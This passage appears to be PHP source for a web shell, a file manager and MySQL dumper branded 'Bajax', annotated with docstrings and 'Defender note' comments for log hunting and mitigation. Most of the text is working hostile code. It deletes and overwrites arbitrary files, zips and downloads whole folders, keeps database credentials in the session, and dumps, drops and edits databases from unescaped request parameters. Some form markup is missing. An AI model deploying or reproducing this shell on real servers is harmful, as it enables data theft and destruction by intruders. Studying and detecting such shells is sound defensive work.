 * Format a byte count for display.
 *
 * Returns the integer 0 for any falsy input; otherwise a string rounded to two
 * decimals with a " GB", " MB" or " KB" suffix (1024-based), or the raw value
 * followed by " B".
 *
 * @param int $s size in bytes
 * @return int|string
 */
function getsize($s)
{
if(!$s) return 0;
if($s>=1073741824) return(round($s/1073741824,2)." GB");
elseif($s>=1048576) return(round($s/1048576,2)." MB");
elseif($s>=1024) return(round($s/1024,2)." KB");
else return($s." B");
}
/**
 * Delete a path recursively.
 *
 * A missing path counts as success. Files and symbolic links are unlinked directly
 * (links are not followed). For a directory each entry is deleted first; when an entry
 * cannot be removed its mode is changed to 0777 and the deletion is retried once
 * before giving up.
 *
 * @param string $dir path to remove
 * @return bool true when the path no longer exists
 */
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!$this->deleteDirectory($dir . "/" . $item)) {
// Loosen permissions on the entry and try once more.
chmod($dir . "/" . $item, 0777);
if (!$this->deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}

/**
 * Normalise a path by turning every backslash into a forward slash.
 *
 * @param string $dir path to normalise
 * @return string
 */
function replace($dir)
{
return str_replace('\\','/', $dir);
}
//remove file or folder
/**
 * Recursively delete the path named by the `file` request parameter.
 *
 * The writability check reads $_REQUEST['file'] while the deletion uses
 * $_GET['file'], so the two can refer to different values when the parameter is sent
 * in more than one place. Prints "Permission Denied !" when the check fails.
 *
 * Defender note: in the visible links this action is reached with
 * `act=file&act3=del&file=...`, which is a searchable pattern in access logs.
 */
function remdir()
{
if(is_writable($_REQUEST['file']))
{
$dir=$_GET['file'];
$this->deleteDirectory($dir);
}
else{echo "Permission Denied !";}
}
/**
 * Delete the regular file named by the `file` query parameter.
 *
 * When the path is not a regular file, alert() is called but its return value is
 * discarded, so nothing is shown to the client.
 */
function remfile()
{
$file=$_GET['file'];
if(is_file($file)){
unlink($file);
}else{$this->alert("Permission Denied");}
}
/**
 * Save the file editor form: optionally rename, then overwrite the file content.
 *
 * The $file argument is not used; all paths come from the request. When the posted
 * `rename` field is non-empty, the posted `file` is first renamed to it. The target
 * $_POST['rename'] is then opened in "w" mode and filled with the posted `isi` field
 * after stripslashes().
 *
 * Defender note: this gives the client an arbitrary-file-write primitive limited only
 * by filesystem permissions; read-only application directories and file-integrity
 * monitoring on the webroot reduce and expose its effect.
 *
 * @param string $file unused
 * @return int 1 on success, 0 when the target cannot be opened
 */
function editfile($file)
{
if(!empty($_POST['rename']))
{
rename($_POST['file'],$_POST['rename']);
}
$fp=fopen($_POST['rename'],'w');
if(!$fp)return 0;
fwrite($fp, stripslashes($_POST['isi']));
fclose($fp);return 1;

}
//rename file to new name
/**
 * Rename the posted `file` path to the posted `rename` path.
 *
 * The unqualified rename(...) call resolves to PHP's built-in function. The `if` ends
 * in an empty statement (`;`), so `return 1` runs regardless of whether the rename
 * succeeded and `return 0` is never reached. Returns nothing when `rename` is empty.
 * The $file argument is not used.
 *
 * @param string $file unused
 * @return int|null
 */
function rename($file)
{
if(!empty($_POST['rename']))
{
if(rename($_POST['file'],$_POST['rename']));
return 1;return 0;
}
}

/**
 * Append a directory entry to the in-memory ZIP archive.
 *
 * Writes a local file record ("PK\x03\x04") with zero sizes and CRC to
 * $this->datasec, and a matching central-directory record ("PK\x01\x02") to
 * $this->ctrl_dir, then advances $this->old_offset.
 *
 * $crc, $c_len and $unc_len are never assigned in this method, so the three fields
 * packed from them after the name are packed from undefined values. $ext is assigned
 * twice and not used.
 *
 * @param string $name directory path inside the archive
 */
function add_dir($name)
{
$name = str_replace("\\", "/", $name);
// Local file record: signature, version, flags, method, time/date.
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
// CRC-32, compressed size and uncompressed size, all zero for a directory.
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
// Total length of all local records so far = offset of the next record.
$new_offset = strlen(implode("", $this->datasec));
// Central-directory record for the same entry.
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
// External attributes 16: the MS-DOS "directory" attribute bit.
$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
/**
 * Append a deflate-compressed file entry to the in-memory ZIP archive.
 *
 * Writes a local file record with the compressed data to $this->datasec and a
 * central-directory record to $this->ctrl_dir, then advances $this->old_offset. The
 * whole file content is held in memory.
 *
 * @param string $data file content
 * @param string $name path of the entry inside the archive
 */
function add_file($data, $name)
{
$name = str_replace("\\", "/", $name);
// Local file record: signature, version, flags, method 8 (deflate), time/date.
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= "\x00\x00\x00\x00";
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
// Drop the first 2 and last 4 bytes of the gzcompress() output, keeping the bytes between.
$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= $zdata;
// CRC and sizes are repeated after the data.
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
// Central-directory record for the same entry.
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x14\x00";
$cdrec .="\x00\x00";
$cdrec .="\x08\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",$crc);
$cdrec .= pack("V",$c_len);
$cdrec .= pack("V",$unc_len);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
// External attributes 32: the MS-DOS "archive" attribute bit.
$cdrec .= pack("V", 32 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
/**
 * Assemble the finished ZIP archive from the buffered records.
 *
 * Concatenates all local records, all central-directory records and the
 * end-of-central-directory block (entry count twice, directory size, directory offset,
 * zero-length comment).
 *
 * @return string raw archive bytes
 */
function file() {
$data = implode("", $this -> datasec);
$ctrldir = implode("", $this -> ctrl_dir);
return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack("v", sizeof($this -> ctrl_dir)).
pack("v", sizeof($this -> ctrl_dir)).
pack("V", strlen($ctrldir)).
pack("V", strlen($data)).
"\x00\x00";
}
/**
 * Walk a directory tree and add every file and sub-directory to the ZIP buffers.
 *
 * Paths are built by plain concatenation, so $directory is expected to end with a
 * separator. Each file is read completely into memory before being added.
 * closedir() is called even when opendir() failed.
 *
 * @param string $directory source directory on disk, with trailing separator
 * @param string $put_into  path prefix inside the archive
 */
function get_files_from_folder($directory, $put_into) {
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle)))
{
if (is_file($directory.$file))
{
$fileContents = file_get_contents($directory.$file);
$this->add_file($fileContents, $put_into.$file);
}
elseif ($file != '.' and $file != '..' and is_dir($directory.$file))
{
$this->add_dir($put_into.$file.'/');
$this->get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
}
}
}
closedir($handle);
}
//download folder into zip
/**
 * Send a whole directory tree to the client as a ZIP attachment, then exit.
 *
 * The archive is assembled twice: once to compute Content-Length and once to echo it.
 *
 * Defender note: in the visible links this action is reached with
 * `act=downfolder&file=...`. Large responses with
 * `Content-Type: application/download` from a PHP endpoint indicate bulk file
 * exfiltration and are visible in proxy or egress byte-count telemetry.
 *
 * @param string $folder directory to archive
 */
function downloadfolder($folder)
{
$this->get_files_from_folder($folder,'');
header("Content-Disposition: attachment; filename=" .$this->cs(basename($folder)).".zip");
header("Content-Type: application/download");
header("Content-Length: " . strlen($this-> file()));
flush();
echo $this->file();
exit();
}
/**
 * Replace every space in a string with an underscore (used for download file names).
 *
 * @param string $t
 * @return string
 */
function cs($t){
return str_replace(" ","_",$t);
}
//converter
/**
 * Encode, decode or hash the posted `convert` field.
 *
 * Supported modes: md5, hexa (bin2hex), 64en / 64de (base64), sha1, urlen / urlde.
 * Any other mode returns nothing. The `break` statements after each `return` are
 * never reached.
 *
 * @param string $isi conversion mode
 * @return string|null
 */
function convert($isi)
{
$i=$_POST['convert'];
switch ($isi) {
case 'md5':$c=md5($i);return $c;break;
case 'hexa':$c=bin2hex($i);return $c;break;
case '64en':$c=base64_encode($i);return $c;break;
case '64de':$c=base64_decode($i);return $c;break;
case 'sha1':$c=sha1($i);return $c;break;
case 'urlen':$c=urlencode($i);return $c;break;
case 'urlde':$c=urldecode($i);return $c;break;
}
}
//current location
/**
 * Render the current directory as a breadcrumb of links, one per path component.
 *
 * Each link targets `?act=$f` with `dir` set to the path accumulated so far. Path
 * components are written into the markup without HTML escaping.
 *
 * @param string $f value for the `act` parameter in each link
 * @return string HTML fragment
 */
function current($f)
{
$d=explode(DIRECTORY_SEPARATOR, $this->dir());
$s='';
$r='';
for ($i=0; $i <count($d); $i++) {
$s.=$d[$i].DIRECTORY_SEPARATOR;
// The last component is rendered without a trailing separator in its label.
($i==count($d)-1?$r.="<a href='?act=$f&dir=".$s."'>$d[$i]</a>":$r.="<a href='?act=$f&dir=".$s."'>$d[$i]".DIRECTORY_SEPARATOR."</a>");
}
return $r;
}
//explorer
/**
 * Render the file browser for the current directory.
 *
 * Lists directories first, then files, each sorted by name, with size, owner:group,
 * permission bits, writability, modification time and action links (rename, delete,
 * edit, download). Entry names and paths are written into the markup unescaped.
 *
 * is_dir(), is_readable(), filesize(), fileperms() and filemtime() are called on bare
 * entry names in several places, so they depend on the chdir() done by dir().
 * posix_getpwuid() is used for the group id as well as the owner id; when the
 * function is missing, both $own and $group are the string "0".
 *
 * Defender note: the link targets show the action vocabulary of the file manager
 * (`act=edit`, `act=ren`, `act=down`, `act=downfolder`, `act2=del`, `act3=del`),
 * which can be matched in access logs.
 *
 * NOTE(review): the <tr>/<td> tags between the concatenated values appear to have
 * been stripped by extraction.
 *
 * @return string HTML fragment
 */
function xpl()
{
// define an array to hold the files
$dname=array();
$fname=array();
if ($dh=opendir($this->dir()))
{
while(false !==($name=readdir($dh))){
if($name !='.'){
(is_dir($name))?$dname[]=$name:$fname[]=$name;
}
}
closedir($dh);
}
sort($dname);
sort($fname);

$r="
Current Location : <br />".$this->current('file');

$r.="
<div id='isi'><table border=0 style='width:100%' cellspacing=0 class='xpltab'><th style='width:50%;'>Name</th><th style='width:70px;'>Size</th><th style='width:100px;'>Owner : Group</th><th style='width:80px;'>Permission</th><th style='width:50px;'>Writable</th><th style='100px;'>Modified</th><th>Action</th>";
foreach( $dname as $folder )
{
$own=function_exists('posix_getpwuid')?posix_getpwuid(fileowner($this->dir().$folder)):"0";
$group=function_exists('posix_getpwuid')?posix_getpwuid(filegroup($this->dir().$folder)):"0";
$owner=$own['name'].":".$group['name'];
$write=is_writable($this->dir().$folder)?"Yes":"No";
// The ".." entry links to the parent directory computed by up().
if($folder =='..')
{
$pwd=$this->up($this->dir());
$r .="<a href='?act=file&amp;dir=$pwd'>$folder </a>LINK$owner".substr(sprintf('%o', fileperms($this->dir().$folder)),-3)."$write".date("d-M-Y H:i",filemtime($this->dir().$folder))."";

} else {
$d=$this->dir();
$r .="<a href='?act=file&amp;dir=$d$folder".DIRECTORY_SEPARATOR."'>$folder /</a>DIR$owner".(is_readable($folder)?substr(sprintf('%o', fileperms($d.$folder.DIRECTORY_SEPARATOR)),-3):'Forbidden')."$write".date("d-M-Y H:i",filemtime($d.$folder.DIRECTORY_SEPARATOR))."<a href='?act=ren&dir=$d&file=$folder'>Ren</a> | <a href='?act=file&act3=del&dir=$d&file=$d$folder'>Del</a> | <a href='?act=downfolder&file=".$this->replace($d.$folder.DIRECTORY_SEPARATOR)."'>Download</a>";
}
}
foreach($fname as $file)
{

$own=function_exists('posix_getpwuid')?posix_getpwuid(fileowner($this->dir().$file)):"0";
$group=function_exists('posix_getpwuid')?posix_getpwuid(filegroup($this->dir().$file)):"0";
$owner=$own['name'].":".$group['name'];
$write=is_writable($this->dir().$file)?"Yes":"No";
$d=$this->dir();
$r .="<a href='?act=file&dir=$d$file'>$file</a>".$this->getSize(filesize($file))."$owner".(is_readable($file)?substr(sprintf('%o', fileperms($file)),-3):'forbidden')."$write".date("d-M-Y H:i",filemtime($file))."<a href='?act=edit&dir=$d&file=$file'>Edit</a> | <a href='?act=ren&dir=$d&file=$file'>Ren</a> | <a href='?act=file&act2=del&dir=$d&file=".$this->replace($d.$file)."'>Del</a> | <a href='?act=down&file=".$this->replace($d.$file)."'>Download</a>";
}
$r .= "</div>";
return $r;

}

//edit file form
/**
 * Render the file editor: the file's content in a textarea named `isi`, plus a
 * rename field.
 *
 * The file content is HTML-escaped before it is placed in the textarea. Returns false
 * when the file cannot be opened for reading. $d is assigned but not used in the
 * visible code.
 *
 * NOTE(review): the <form> and <input> elements appear to have been stripped by
 * extraction; only the textarea and labels remain.
 *
 * @param string $file path of the file to edit
 * @return string|false HTML fragment
 */
function edit($file)
{
$d=$this->dir();
$fp = fopen($file,'r');
if (!$fp)
return false;
$r = '';
$r .= '<div id="isi">
'
.'';
$r .= '<textarea name="isi">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea><br />';
$r .= '<span style="color:#fff;margin-right:5px;text-align:center">Rename : </span></span> <br />';
$r .= '
</div>';
fclose($fp);
return $r;
}
//rename file form
/**
 * Render the rename form for a file.
 *
 * The file is opened for reading only to check that it is accessible; nothing is read
 * from it. Returns false when it cannot be opened. $d is assigned but not used in the
 * visible code.
 *
 * NOTE(review): the <form> and <input> elements appear to have been stripped by
 * extraction; only the "To" label remains.
 *
 * @param string $file path of the file to rename
 * @return string|false HTML fragment
 */
function ren($file)
{
$d=$this->dir();
$fp=fopen($file,'r');
if(!$fp)return false;
$r='';
$r.="<div id='isi'>
";
$r.='';
$r.='
To
<br />
</div>';
fclose($fp);
return $r;
}
//alert when something happen
/**
 * Wrap a message in a <script>alert('...')</script> element.
 *
 * The text is inserted into the JavaScript string literal without escaping.
 *
 * @param string $text message to show
 * @return string HTML fragment
 */
function alert($text)
{
$r="<script>alert('".$text."');</script>";
return $r;
}
/**
 * Stream a file to the client as an attachment, then terminate.
 *
 * The Content-length header is built from getSize($f), that is, from the path string
 * itself rather than from filesize(), so its value does not reflect the file's size.
 * The path is not restricted to any directory.
 *
 * Defender note: in the visible links this action is reached with
 * `act=down&file=...`; requests naming configuration or credential files there show
 * what was taken.
 *
 * @param string $f path of the file to send
 */
function downloadfile($f)
{
header("Content-type:application/octet-stream");
header("Content-length:".$this->getSize($f));
header("Content-Disposition:attachment;filename=".basename($f));
readfile($f);
die();
}
/**
 * MySQL client login step.
 *
 * Without a session `login` flag and without a posted `masuk` field, returns the
 * connection form. With `masuk` posted, imports every POST field as a local variable
 * via extract(), connects with mysql_connect(), stores host, port, user and password
 * in the session in clear text, and redirects to `act=view`. Otherwise it only
 * redirects.
 *
 * The mysql_* functions used by this and the following methods were removed in
 * PHP 7.0, so this part of the tool only functions on older runtimes.
 *
 * Defender note: database credentials typed here are kept in the PHP session store;
 * on a compromised host, rotate any database account whose credentials were readable
 * by the web application.
 *
 * NOTE(review): the form's <input> elements appear to have been stripped by
 * extraction.
 *
 * @return string|null HTML fragment when the form is shown
 */
function login()
{
if(!isset($_SESSION['login'])&&!isset($_POST['masuk']))
{
$r='';
$r.= '<div id="center">
Host : Username :Password </div>
';
return $r;
}
elseif(!isset($_SESSION['login'])&&isset($_POST['masuk']))
{
// extract() turns every posted field into a local variable ($host, $port, $user, $pass, ...).
extract($_POST);
$this->con=mysql_connect($host.":".$port,$user,$pass) or die(header("location:?act=mysql"));
$_SESSION['host']=$_POST['host'];
$_SESSION['port']=$_POST['port'];
$_SESSION['user']=$_POST['user'];
$_SESSION['pass']=$_POST['pass'];
$_SESSION['login']=true;


header("location:?act=view&dir=".$this->dir()."");
}
else header("location:?act=view&dir=".$this->dir()."");



}
//connect with session created
/**
 * Open a MySQL connection with the credentials saved in the session.
 *
 * extract($_SESSION) imports every session key as a local variable; $host, $port,
 * $user and $pass are expected to be among them.
 *
 * @return resource|false connection handle from mysql_connect()
 */
function connector()
{
extract($_SESSION);
$c=mysql_connect($host.":".$port,$user,$pass);
return $c;
}
//end session
/**
 * Return a "user@host" label with a logout link.
 *
 * This method only renders the link (`?act=logout`); it does not itself clear the
 * session. The handler for that action is outside the visible listing.
 *
 * @return string HTML fragment
 */
function logout()
{
extract($_SESSION);
return "
$user@$host <a href='?act=logout'>Logout</a>
";
}
//free the query result
/**
 * Release a MySQL result set (thin wrapper around mysql_free_result()).
 *
 * @param resource $re result handle
 * @return bool
 */
function free($re)
{
return mysql_free_result($re);
}
//query mysql
/**
 * Run a SQL statement on the most recently opened MySQL connection (thin wrapper
 * around mysql_query()). Callers build $q by interpolating request values directly.
 *
 * @param string $q SQL text
 * @return resource|bool
 */
function qe($q)
{
return mysql_query($q);
}
//show databases list
/**
 * List every database on the connected server with its table count and with
 * download / drop links, followed by a "New database" form and the SQL command box.
 *
 * When the connection fails the session is destroyed and an error string is appended;
 * $r has not been initialised on that path. mysql_close($c) runs on both paths.
 *
 * Defender note: the links expose the action names `act=showtable`, `act=downdb` and
 * `act=dropdb`, which are searchable in access logs to establish whether databases
 * were dumped or dropped.
 *
 * NOTE(review): table row/cell tags and the <form> wrapper appear to have been
 * stripped by extraction.
 *
 * @return string HTML fragment
 */
function lihatdb()
{
$c=$this->connector();
if($c)
{
$r='';
$r.=$this->logout();
$r.="<div id='isi'><table width=50% align='center' cellspacing=0 class='xpltab'><th style='border-left:thin solid #f00;'>Database</th><th>Table count</th><th>Download</th><th>Drop</th>";
$list=mysql_list_dbs($c);
while($isi=mysql_fetch_assoc($list))
{
$tbl=$this->qe("SHOW TABLES FROM $isi[Database]");
$tbl_count=mysql_num_rows($tbl);
$r.= "<a href='?act=showtable&db=$isi[Database]'>$isi[Database]$tbl_count<a href='?act=downdb&db=$isi[Database]'>Download</a><td style='border-right:thin solid #f00;'><a href='?act=dropdb&db=$isi[Database]'>Drop</a>";
}
$r.= "
New database <input type='text' value='new_db' name='dbname' id='box'><input type='hidden' name='action' value='createdb'><input type='submit' value='create' id='but'>
";
$r.=$this->sqlcommand()."</div>";
$this->free($tbl);
}
else {
session_destroy();
$r.="gagal brow";
}
mysql_close($c);
return $r;
}
//show table list from selected database
/**
 * List the tables of the database named by the `db` query parameter, with column
 * counts and dump / drop links.
 *
 * The parameter is interpolated into the SQL text and the markup as-is. The three
 * cleanup calls after `return $r;` are never executed.
 *
 * @return string HTML fragment
 */
function showtable()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$r.="<div id='isi'>
<a href='?act=mysql'>Show Database</a>
<br />
<table width=50% align='center' class='xpltab' cellspacing=0 ><th style='border-left:thin solid #f00;'>Table</th><th>Column count</th><th>Dump</th><th>Drop</th>";
$db=$_GET['db'];
$query=$this->qe("SHOW TABLES FROM $db");
while($data=mysql_fetch_array($query))
{

$iml=$this->qe("SHOW COLUMNS FROM $db.$data[0]");
$h=mysql_num_rows($iml);
$r.= "<a href='?act=showcon&db=$db&table=$data[0]'>$data[0]$h<a href='?act=downdb&db=$db&table=$data[0]'>Dump</a><td style='border-right:thin solid #f00;'><a href='?act=dropdb&db=$db&tbl=$data[0]'>Drop</a>";

}

$r.= "".$this->sqlcommand()."</div>";
return $r;
$this->free($query);
$this->free($iml);
mysql_close($c);
}
//show all content from table selected
/**
 * Show every row of the table named by the `db` and `table` query parameters.
 *
 * Column names become the header row; each data row is followed by edit / delete
 * links keyed on the first column's value. Cell values are written into the markup
 * without escaping. $c first holds the connection and is then reused as the loop
 * variable for column rows. $cols is fetched inside the row loop but not used.
 *
 * Defender note: this is a full-table read with no row limit; the actions
 * `act=showcon`, `act=editrow`, `act=delrow` and `act=insertrow` in access logs show
 * which tables were browsed or changed.
 *
 * @return string HTML fragment
 */
function showcon()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$db=$_GET['db'];
$tbl=$_GET['table'];
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />
<table width=100% align='center' cellspacing=0 class='xpltab'>";

$query=$this->qe("SELECT * FROM $db.$tbl");
$col=array();
$iml=$this->qe("SHOW COLUMNS FROM $db.$tbl");
$r.="";
while ($c=mysql_fetch_assoc($iml)) {
array_push($col,$c['Field']);
$r.="<th style='border:thin solid #000;'>".strtoupper($c['Field'])."</th>";
}
$r.="<th>Action</th>";
while($data=mysql_fetch_row($query))
{
$cols=mysql_fetch_row($iml);

$r.="";
foreach ($data as $da) {
$r.="<td style='border-right:thin solid #f00;'>".$da."";
}

$r.="<a href='?act=editrow&db=$db&table=$tbl&col=$col[0]&val=$data[0]'>Edit</a> | <a href='?act=delrow&db=$db&table=$tbl&col=$col[0]&val=$data[0]'>Delete</a>";

$r.="";
}
$r.= "<br />
<a href='?act=insertrow&db=$db&table=$tbl'><input type='button' id='but' value='Insert Row'></a>
".$this->sqlcommand()."</div>";
$this->free($query);
$this->free($iml);
return $r;
}
/**
 * Dump one table or a whole database as SQL text and send it as a download.
 *
 * With `db` and `table` set, dumps that table; with only `db` set, dumps every table
 * of the database. For each table a CREATE TABLE statement is rebuilt from
 * SHOW COLUMNS and one INSERT is emitted per row; values are joined with quotes but
 * not escaped. The whole dump is built in memory. Any buffered page output is
 * discarded, the dump is echoed as application/octet-stream, and the script exits, so
 * the cleanup calls after exit() never run.
 *
 * The second branch tests `tbl` while the first tests `table`, so the two conditions
 * look at different parameter names.
 *
 * Defender note: responses from `act=downdb` carrying the banner text
 * "mysql Dumper bajax" or "Bajax Mysql Dumper" mark database exfiltration; the strings
 * can be matched in egress inspection or in recovered files.
 */
function downdb()
{
$c=$this->connector();
//downloading specific table

if (isset($_GET['db'])&&isset($_GET['table'])) {
$db=$_GET['db'];
$tbl=$_GET['table'];
$r="-- =========================mysql Dumper bajax =============================\n-- Database $db\n-- Table Name : $tbl\n\n";
$tab=$this->qe("SELECT * FROM $db.$tbl");
$query2=$this->qe("SHOW COLUMNS FROM $db.$tbl");
$r.="CREATE TABLE IF NOT EXISTS `$tbl` (\n";
// All columns but the last are emitted in the loop; the last one follows separately.
for($i=0;$i<mysql_num_rows($query2)-1;$i++)
{
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'').(reset($result)?',':'')."\n";
}
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'')."\n";
$r.=");\n";
$select=$this->qe("SELECT * FROM $db.$tbl");
while($data=mysql_fetch_assoc($select))
{
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.="INSERT INTO `$tbl` ($col) VALUES ('$val');\n";
}
$r.="\n";
}
//downloading database
elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
{
$db=$_GET['db'];
$tables=array();
$column=array();
$r='';
$r.="-- =========================Bajax Mysql Dumper =============================\n-- Database : `$db`\n\n";
$query=$this->qe("SHOW TABLES FROM $db");

while($list=mysql_fetch_array($query))
$tables[]=$list[0];
foreach ($tables as $d) {
//well i spend more time here :D
$query2=$this->qe("SHOW COLUMNS FROM $db.$d");
$r.="CREATE TABLE IF NOT EXISTS `$d` (\n";
for($i=0;$i<mysql_num_rows($query2)-1;$i++)
{

$result=mysql_fetch_array($query2);

$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'').(reset($result)?',':'')."\n";
}
$result=mysql_fetch_array($query2);
$r.='`'.$result[0].'` '.$result[1].($result[2]=='NO'&&$result[4]!='NULL'?' NOT NULL ':' DEFAULT NULL').strtoupper($result[5]).($result[5]==true?" PRIMARY KEY":'')."\n";
$r.=");\n";
$select=$this->qe("SELECT * FROM $db.$d");


while($data=mysql_fetch_assoc($select))
{
$col=implode(', ',array_keys($data));
$val=implode("', '",array_values($data));
$r.="INSERT INTO `$d` ($col) VALUES ('$val');\n";
}
$r.="\n";
}
}
else echo "i don't know brow";

// Download name: "<db>.sql" for a database dump, "<db>.<table>.sql" for a table dump.
(!isset($tbl)?$name="$db.sql":$name="$db.$tbl.sql");
ob_get_clean();
header("Content-type:application/octet-stream");
header("Content-length:".strlen($r));
header("Content-Disposition:attachment;filename=$name;");
echo $r;
exit();
$this->free($query);
$this->free($query2);
$this->free($select);
mysql_close();
}
//drop database or table
/**
 * Drop a database, or a single table when the `tbl` query parameter is present.
 *
 * Names are taken from the query string and interpolated into the statement as-is.
 * The action is triggered by a plain GET request and redirects afterwards.
 *
 * Defender note: in the visible links this is reached with `act=dropdb`. A database
 * account restricted to the privileges the application needs (no DROP) limits what
 * this method can do with stolen application credentials.
 */
function dropsql()
{
$this->connector();
if(!isset($_GET['tbl'])){
$d=$this->qe("DROP DATABASE $_GET[db]");
header("location:?act=mysql");
}
elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
$this->qe("DROP TABLE $_GET[db].$_GET[tbl]");
header("location:?act=showtable&db=$_GET[db]");
}
}
//create new database
/**
 * Create a database with the given name.
 *
 * A status message is appended to a local $r that is never initialised and never
 * returned, so the caller gets no result from this method.
 *
 * @param string $name database name, interpolated into the statement as-is
 */
function createdb($name)
{
$this->connector();
if(!empty($name))
{
$q=$this->qe("CREATE DATABASE $name");
(!$q?$r.=mysql_error():$r.="Good Brow");

}
else $r.="Fill DB Name";
//header("location:?act=mysql");
}
//edit specific record on tables
// Renders the "edit record" page for one row.
// Reads db, table, col and val from $_GET. All four are interpolated unescaped
// into the SQL below, and $db is also echoed unescaped into the href.
// Returns the accumulated HTML string.
// Defender note: reached through ?act=editrow; the page posts back with the
// hidden field action=updaterow.
function editrow()
{
$c=$this->connector();
$r='';
$r.=$this->logout();
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />";
$r.="
";
$r.="<table width=100% align='center' cellspacing=0 class='xpltab'>";

$cols=array();
// Uses mysql_query() directly rather than the $this->qe() wrapper used elsewhere.
$iml=mysql_query("SHOW COLUMNS FROM $db.$tbl");
$query=mysql_query("SELECT * FROM $db.$tbl WHERE $col='$val'");

// Collect the column names of the target table.
while($colom=mysql_fetch_assoc($iml))$cols[]=$colom['Field'];
// The row is fetched, but $data is not referenced again in this listing
// NOTE(review): the per-column input markup may have been lost in extraction — confirm.
$data=mysql_fetch_assoc($query);
for($i=0;$i<count($cols);$i++)
{
$pt=$cols[$i];
$r.="<td style='border:none'>".$pt."<td style='border:none'>".' : ';

}
$r.="<input type='hidden' name='action' value='updaterow'><input id='but' type='submit' value='update'>
</div>";
return $r;
// Unreachable: placed after the return.
$this->free();
}
//update record
// Applies posted field values to the row selected by the query string.
// Target (db, table, col, val) comes from $_GET; the column/value pairs come
// from $_POST. Every piece is interpolated unescaped into the UPDATE statement.
// Defender note: triggered by a POST carrying action=updaterow; one UPDATE is
// issued per posted field.
function updaterow()
{
$this->connector();
$db=$_GET['db'];
$tbl=$_GET['table'];
$val=$_GET['val'];
$col=$_GET['col'];

// Discards the last posted field before looping
// (presumably the submit/action control — verify against the form).
array_pop($_POST);
foreach ($_POST as $key => $value) {
$c=$this->qe("UPDATE $db.$tbl SET $key='$value' WHERE $col='$val'");
// header() has no return value, so the append adds nothing; only the redirect matters.
$r.=header("location:?act=showcon&db=$db&table=$tbl");
}
$this->free($c);
}
//delete record
// Deletes the rows where column $_GET['col'] equals $_GET['val'] in
// $_GET['db'].$_GET['table'], then redirects to the table content view.
// All four request values are interpolated unescaped into the DELETE.
// Defender note: dispatched from ?act=delrow.
function droprow()
{
$this->connector();
$this->qe("DELETE FROM $_GET[db].$_GET[table] WHERE $_GET[col]='$_GET[val]'");
// header() has no return value; $r is not initialised and nothing is returned.
$r.=header("location:?act=showcon&db=$_GET[db]&table=$_GET[table]");
}
//insert record
// Two-step "insert record" handler.
// Without $_POST['kirim'] it returns the entry page listing the table's columns.
// With it, it builds one INSERT from the posted values and runs it.
// db/table come from $_GET and the values from $_POST, all interpolated unescaped.
// Returns the HTML / status string.
// Defender note: reachable via ?act=insertrow and via POST action=insertrow.
function insertrow()
{
$this->connector();
